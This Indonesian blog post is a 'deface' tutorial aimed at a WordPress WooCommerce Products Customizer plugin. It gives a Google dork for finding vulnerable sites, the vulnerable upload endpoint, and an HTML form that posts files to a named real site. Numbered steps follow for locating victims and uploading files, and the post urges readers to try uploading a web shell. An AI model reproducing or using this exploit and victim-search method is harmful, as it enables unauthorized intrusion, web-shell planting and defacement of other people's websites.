Cara Deface WP Plugins WooCommerce Products Customizer Fileupload - RasyidMF

Cara Deface WP Plugins WooCommerce Products Customizer Fileupload

Hasil gambar untuk WP Plugins WooCommerce Products Customizer Fileupload
Cara Deface WP Plugins WooCommerce Products Customizer Fileupload
Yak kali ini ane akan mengshare Tutorial "Cara Deface WP Plugins WooCommerce Products Customizer Fileupload"
sebenarnya nih bukan deface ! atau cuman bisa upload gambar ! tpi gk thu juga kan , cobain aja pas bisa upload shell
Tadi ane barusan aja muter muter di web orang , nah pas ane bukan foldernya woocommerce-products-customizer . tiba tiba blank ane coba coba mau :D
Tpi pas itu ane coba upload shell gk mau , mungkin di web lain bisa :D. Bisa bisa neh Trik baru :D 

HTML Vroh : <form method="POST" action="http://test.jacketman.net/wp-content/plugins/woocommerce-products-customizer/jquery_calls.php"
enctype="multipart/form-data">
<input type="file" name="userfile"/><button>Croot Punyamu</button>
</form>

Yang warna biru ganti webnya :D

Dorknya Guyss : 
inurl:/wp-content/plugins/woocommerce-products-customizer/

Exploit nya guys : /wp-content/plugins/woocommerce-products-customizer/jquery_calls.php

Tutorial :

1.Cari web dari dork yang udeh mimin siapkan , buka web tersebut . masukan exploit , jika Gambarnya Blank berarti Vuln :D
2.Kemudian buka HTML Exploit nya tadi , kemudian cari file .jpg atau terserah lah
3.Jika berhasil maka akan muncul seperti dibawah ini
4.Filenya akan berada di http://test.jacketman.net//wp-content//uploads//57f9e15a25804.jpg
5.Jika gk berhasil , mungkin muncul nya cuman tulisan :D
6.Enjoy


Trik Dari Mastah Ane : Mr.D3c0d3r #98 + 5uSu S4p1

-=- THANKS FOR READING :D -=-

Share this:

Post a Comment

Rules :
1.Komentar yang baik,sopan, dan jelas
2.Jangan spam -__-
3.Jika ada problem dari postingnya, koment :3

 
Copyright © RasyidMF. Designed by OddThemes & Best Wordpress Themes 2018